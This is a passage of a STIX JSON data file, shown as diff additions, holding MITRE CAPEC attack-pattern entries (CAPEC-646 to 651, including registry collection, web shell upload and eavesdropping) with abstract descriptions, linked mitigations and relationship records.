"identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Reset the built-in KRBTGT account password twice to invalidate the existence of any current Golden Tickets and any tickets derived from them.", + "id": "course-of-action--cc52780c-b04c-4940-a2d6-0498907ce5cf", + "modified": "2020-07-30T00:00:00.000Z", + "name": "coa-645-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5b6333f5-1f2a-4b5f-94e2-17a344115ffb", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--cc52780c-b04c-4940-a2d6-0498907ce5cf", + "target_ref": "attack-pattern--05740120-81ef-4224-9805-2f0b54d1111f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b8766158-fd84-4765-94da-1c65d865c83b", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--0257f904-bcb7-445e-9ef7-f9d294e49f67", + "target_ref": "attack-pattern--05740120-81ef-4224-9805-2f0b54d1111f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Adversaries may attempt to obtain information about attached peripheral devices and components connected to a computer system. Examples may include discovering the presence of iOS devices by searching for backups, analyzing the Windows registry to determine what USB devices have been connected, or infecting a victim system with malware to report when a USB device has been connected. This may allow the adversary to gain additional insight about the system or network environment, which may be useful in constructing further attacks.", + "external_references": [ + { + "external_id": "CAPEC-646", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/646.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "description": "Peripheral Device Discovery", + "external_id": "T1120", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1120" + } + ], + "id": "attack-pattern--658d6220-f15c-44fb-8690-1d14088ed637", + "modified": "2020-07-30T00:00:00.000Z", + "name": "Peripheral Footprinting", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_follow_refs": [ + "attack-pattern--c8c9dfbe-7a40-4041-84ff-89942878a2f4" + ], + "x_capec_child_of_refs": [ + "attack-pattern--87b0d2df-b246-4bf9-aee8-4912e2fa1a30" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The adversary needs either physical or remote access to the victim system." + ], + "x_capec_skills_required": { + "Medium": "If analyzing the Windows registry, the adversary must understand the registry structure to know where to look for devices." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d9f6ac50-d71a-415a-a9f3-6b159c887206", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a2404315-1d87-4e47-a8e4-c6b2cfe457d8", + "target_ref": "attack-pattern--658d6220-f15c-44fb-8690-1d14088ed637", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-05-15T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits a weakness in authorization to gather system-specific data and sensitive information within a registry (e.g., Windows Registry, Mac plist). These contain information about the system configuration, software, operating system, and security. The adversary can leverage information gathered in order to carry out further attacks.", + "external_references": [ + { + "external_id": "CAPEC-647", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/647.html" + }, + { + "external_id": "CWE-285", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/285.html" + }, + { + "description": "Data from Local System", + "external_id": "T1005", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1005" + }, + { + "description": "Query Registry", + "external_id": "T1012", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1012" + }, + { + "description": "Unsecured Credentials: Credentials in Registry", + "external_id": "T1552.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1552/002" + } + ], + "id": "attack-pattern--ad242ccf-3578-4787-937c-22eb0ede3fb6", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Collect Data from Registries", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--797f4b4e-371a-4d06-9e98-5cccb8a7ebc1" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data (The adversary is able to read sensitive information about the system in the registry.)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Gain logical access to system: An adversary must first gain logical access to the system it wants to gather registry information from,

    2. Techniques
    Obtain user account credentials and access the system
    Plant malware on the system that will give remote logical access to the adversary

Experiment

  1. Determine if the permissions are correct: Once logical access is gained, an adversary will determine if they have the proper permissions, or are authorized, to view registry information. If they do not, they will need to escalate privileges on the system through other means

  2. Peruse registry for information: Once an adversary has access to a registry, they will gather all system-specific data and sensitive information that they deem useful.

Exploit

  1. Follow-up attack: Use any information or weaknesses found to carry out a follow-up attack

", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The adversary must have obtained logical access to the system by some means (e.g., via obtained credentials or planting malware on the system).", + "The adversary must have capability to navigate the operating system to peruse the registry." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Low": "Once the adversary has logical access (which can potentially require high knowledge and skill level), the adversary needs only the capability and facility to navigate the system through the OS graphical user interface or the command line." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2018-05-15T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--46c95866-35f0-4eb3-8236-3cf76d28c354", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9c745fa6-97fd-4aa7-830c-2522e1df5ea6", + "target_ref": "attack-pattern--ad242ccf-3578-4787-937c-22eb0ede3fb6", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-05-15T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Employ robust identification and audit/blocking via using an allowlist of applications on your system. Unnecessary applications, utilities, and configurations will have a presence in the system registry that can be leveraged by an adversary through this attack pattern.", + "id": "course-of-action--b20b8831-79c4-401b-9767-4c506d59c2d9", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-647-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-05-15T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--df86fcb3-a484-4707-a8c7-d61b784214bb", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b20b8831-79c4-401b-9767-4c506d59c2d9", + "target_ref": "attack-pattern--ad242ccf-3578-4787-937c-22eb0ede3fb6", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary gathers sensitive information by exploiting the system's screen capture functionality. Through screenshots, the adversary aims to see what happens on the screen over the course of an operation. The adversary can leverage information gathered in order to carry out further attacks.", + "external_references": [ + { + "external_id": "CAPEC-648", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/648.html" + }, + { + "external_id": "CWE-267", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/267.html" + }, + { + "description": "Screen Capture", + "external_id": "T1113", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1113" + }, + { + "description": "Screen Capture", + "external_id": "T1513", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1513" + } + ], + "id": "attack-pattern--140142cc-28cb-4506-bce6-b44128b7b9a7", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Collect Data from Screen Capture", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--797f4b4e-371a-4d06-9e98-5cccb8a7ebc1" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data (The adversary is able to capture potentially sensitive information and processes as they appear on the screen.)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The adversary must have obtained logical access to the system by some means (e.g., via obtained credentials or planting malware on the system)." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Low": "Once the adversary has logical access (which can potentially require high knowledge and skill level), the adversary needs only to leverage the relevant command for screen capture." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Identify potentially malicious software that may have functionality to acquire screen captures, and audit and/or block it by using allowlist tools.", + "id": "course-of-action--c4331607-533f-4210-910b-2ce3a63f070a", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-648-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6e4ee62c-e443-4037-aa6a-3ddddcf93324", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c4331607-533f-4210-910b-2ce3a63f070a", + "target_ref": "attack-pattern--140142cc-28cb-4506-bce6-b44128b7b9a7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "While screen capture is a legitimate and practical function, certain situations and context may require the disabling of this feature.", + "id": "course-of-action--ec0a0b82-9297-4d4b-8a03-975dc1cdd2e7", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-648-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e559a56f-da83-4f00-bf13-dda7f216f4e3", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ec0a0b82-9297-4d4b-8a03-975dc1cdd2e7", + "target_ref": "attack-pattern--140142cc-28cb-4506-bce6-b44128b7b9a7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-05-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary adds a space character to the end of a file extension and takes advantage of an application that does not properly neutralize trailing special elements in file names. This extra space, which can be difficult for a user to notice, affects which default application is used to operate on the file and can be leveraged by the adversary to control execution.", + "external_references": [ + { + "external_id": "CAPEC-649", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/649.html" + }, + { + "external_id": "CWE-46", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/46.html" + }, + { + "description": "Masquerading:Space after Filename", + "external_id": "T1036.006", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1036/006" + } + ], + "id": "attack-pattern--f18ec51a-9ecd-49bf-9b91-5f5288306f70", + "modified": "2020-07-30T00:00:00.000Z", + "name": "Adding a Space to a File Extension", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--95afb65f-ece7-4511-85a3-d7bfb9973022" + ], + "x_capec_consequences": { + "Availability": [ + "Execute Unauthorized Commands" + ], + "Confidentiality": [ + "Execute Unauthorized Commands" + ], + "Integrity": [ + "Execute Unauthorized Commands" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The use of the file must be controlled by the file extension." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2018-05-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "File extensions should be checked to see if non-visible characters are being included.", + "id": "course-of-action--ca9bac26-36eb-4576-996b-53f3e979c3ed", + "modified": "2020-07-30T00:00:00.000Z", + "name": "coa-649-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-05-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--06d27c54-f604-4253-9b67-9e78cfe16886", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ca9bac26-36eb-4576-996b-53f3e979c3ed", + "target_ref": "attack-pattern--f18ec51a-9ecd-49bf-9b91-5f5288306f70", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary passively sniffs network communications and captures application code bound for an authorized client. Once obtained, they can use it as-is, or through reverse-engineering glean sensitive information or exploit the trust relationship between the client and server. Such code may belong to a dynamic update to the client, a patch being applied to a client component or any such interaction where the client is authorized to communicate with the server.", + "external_references": [ + { + "external_id": "CAPEC-65", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/65.html" + }, + { + "external_id": "CWE-319", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/319.html" + }, + { + "external_id": "CWE-311", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/311.html" + }, + { + "external_id": "CWE-318", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/318.html" + }, + { + "external_id": "CWE-693", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/693.html" + }, + { + "description": "Network Sniffing", + "external_id": "T1040", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1040" + } + ], + "id": "attack-pattern--3147f1c9-3043-40ca-ad42-c1be938820a4", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Sniff Application Code", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + "attack-pattern--55ce63d0-6143-4b95-b70c-87c5b60aafa8" + ], + "x_capec_child_of_refs": [ + "attack-pattern--bdcdc784-d891-4ca8-847b-38ddca37a6ec" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Read Data", + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_example_instances": [ + "Attacker receives notification that the computer/OS/application has an available update, loads a network sniffing tool, and extracts update data from subsequent communication. The attacker then proceeds to reverse engineer the captured stream to gain sensitive information, such as encryption keys, validation algorithms, applications patches, etc..", + "Plain code, such as applets or JavaScript, is also part of the executing application. If such code is transmitted unprotected, the attacker can capture the code and possibly reverse engineer it to gain sensitive information, such as encryption keys, validation algorithms and such." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Set up a sniffer: The adversary sets up a sniffer in the path between the server and the client and watches the traffic.

    2. Techniques
    The adversary sets up a sniffer in the path between the server and the client.

Exploit

  1. [Capturing Application Code Bound During Patching]adversary knows that the computer/OS/application can request new applications to install, or it periodically checks for an available update. The adversary loads the sniffer set up during Explore phase, and extracts the application code from subsequent communication. The adversary then proceeds to reverse engineer the captured code.

    2. Techniques
    adversary loads the sniffer to capture the application code bound during a dynamic update.
    The adversary proceeds to reverse engineer the captured code.
", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The attacker must have the ability to place themself in the communication path between the client and server.", + "The targeted application must receive some application code from the server; for example, dynamic updates, patches, applets or scripts.", + "The attacker must be able to employ a sniffer on the network without being detected." + ], + "x_capec_resources_required": [ + "\n The Attacker needs the ability to capture communications between the client being updated and the server providing the update.\n In the case that encryption obscures client/server communication the attacker will either need to lift key material from the client.\n " + ], + "x_capec_skills_required": { + "Medium": "The attacker needs to setup a sniffer for a sufficient period of time so as to capture meaningful quantities of code. The presence of the sniffer should not be detected on the network. Also if the attacker plans to employ an adversary-in-the-middle attack (CAPEC-94), the client or server must not realize this. Finally, the attacker needs to regenerate source code from binary code if the need be." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Encrypt all communication between the client and server.", + "id": "course-of-action--c929e01c-c2b8-495f-bac3-4e6b80ae2d7b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-65-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f11fbd0b-3fdd-4f8c-b521-a759509f3c72", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c929e01c-c2b8-495f-bac3-4e6b80ae2d7b", + "target_ref": "attack-pattern--3147f1c9-3043-40ca-ad42-c1be938820a4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Use SSL, SSH, SCP.", + "id": "course-of-action--dd68f1a2-41e9-4d58-8759-18724265ed85", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-65-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f45fd050-a931-464c-985d-2ee73ad18461", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--dd68f1a2-41e9-4d58-8759-18724265ed85", + "target_ref": "attack-pattern--3147f1c9-3043-40ca-ad42-c1be938820a4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Operation: Use \"ifconfig/ipconfig\" or other tools to detect the sniffer installed in the network.", + "id": "course-of-action--f3d9104c-7744-4b8d-a0ad-eda7ccd58f13", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-65-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--817eac3b-7a9b-49f3-853d-f4f1190b3d05", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f3d9104c-7744-4b8d-a0ad-eda7ccd58f13", + "target_ref": "attack-pattern--3147f1c9-3043-40ca-ad42-c1be938820a4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-05-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "By exploiting insufficient permissions, it is possible to upload a web shell to a web server in such a way that it can be executed remotely. This shell can have various capabilities, thereby acting as a \"gateway\" to the underlying web server. The shell might execute at the higher permission level of the web server, providing the ability the execute malicious code at elevated levels.", + "external_references": [ + { + "external_id": "CAPEC-650", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/650.html" + }, + { + "external_id": "CWE-287", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/287.html" + }, + { + "external_id": "CWE-553", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/553.html" + }, + { + "description": "Server Software Component:Web Shell", + "external_id": "T1505.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1505/003" + } + ], + "id": "attack-pattern--b9cddd44-a617-4a56-8560-0ca1cd9af42a", + "modified": "2020-12-17T00:00:00.000Z", + "name": "Upload a Web Shell to a Web Server", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--9ad2c2eb-9939-4590-9683-2e789692d262" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands" + ], + "Confidentiality": [ + "Read Data", + "Gain Privileges", + "Execute Unauthorized Commands" + ], + "Integrity": [ + "Execute Unauthorized Commands" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_prerequisites": [ + "The web server is susceptible to one of the various web application exploits that allows for uploading a shell file." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2018-05-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Make sure your web server is up-to-date with all patches to protect against known vulnerabilities.", + "id": "course-of-action--0bda0539-7bb3-4094-8f97-c0e908214b20", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-650-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-05-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--94978147-aaca-4748-8abc-5609dc8c0133", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--0bda0539-7bb3-4094-8f97-c0e908214b20", + "target_ref": "attack-pattern--b9cddd44-a617-4a56-8560-0ca1cd9af42a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-05-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure that the file permissions in directories on the web server from which files can be execute is set to the \"least privilege\" settings, and that those directories contents is controlled by an allowlist.", + "id": "course-of-action--3787e994-06dd-4cd3-a066-e53bd6493039", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-650-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-05-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--34439947-c6ff-46d0-a607-e7439be9d509", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3787e994-06dd-4cd3-a066-e53bd6493039", + "target_ref": "attack-pattern--b9cddd44-a617-4a56-8560-0ca1cd9af42a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary intercepts a form of communication (e.g. text, audio, video) by way of software (e.g., microphone and audio recording application), hardware (e.g., recording equipment), or physical means (e.g., physical proximity). The goal of eavesdropping is typically to gain unauthorized access to sensitive information about the target for financial, personal, political, or other gains. Eavesdropping is different from a sniffing attack as it does not take place on a network-based communication channel (e.g., IP traffic). Instead, it entails listening in on the raw audio source of a conversation between two or more parties.", + "external_references": [ + { + "external_id": "CAPEC-651", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/651.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "description": "Multi-Factor Authentication Interception", + "external_id": "T1111", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1111" + } + ], + "id": "attack-pattern--94e596d2-6844-4031-80c3-8522642aaff8", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Eavesdropping", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--bdc2219a-ebe0-4372-90b8-841dd7bd4c8e" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Other (The adversary gains unauthorized access to information.)" + ] + }, + "x_capec_domains": [ + "Communications", + "Software", + "Physical Security" + ], + "x_capec_parent_of_refs": [ + "attack-pattern--a4986dd8-cb9c-45cb-bb53-b7549f2b8d62", + "attack-pattern--a7ed6b37-4ede-4c34-bbb2-c422fb844d74", + "attack-pattern--0a8ef002-1cb8-46e1-bc44-efd0a39b2a67" + ], + "x_capec_prerequisites": [ + "The adversary typically requires physical proximity to the target's environment, whether for physical eavesdropping or for placing recording equipment. This is not always the case for software-based eavesdropping, if the adversary has the capability to install malware on the target system that can activate a microphone and record audio digitally." + ], + "x_capec_resources_required": [ + "For logical eavesdropping, some equipment may be necessary (e.g., microphone, tape recorder, etc.). For physical eavesdropping, only proximity is required." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Be mindful of your surroundings when discussing sensitive information in public areas.", + "id": "course-of-action--80199435-cd0f-4050-b9c4-faae49a620cd", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-651-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--1641c1d2-3516-4cc2-9d1f-2358c9d3f117", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--80199435-cd0f-4050-b9c4-faae49a620cd", + "target_ref": "attack-pattern--94e596d2-6844-4031-80c3-8522642aaff8", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": 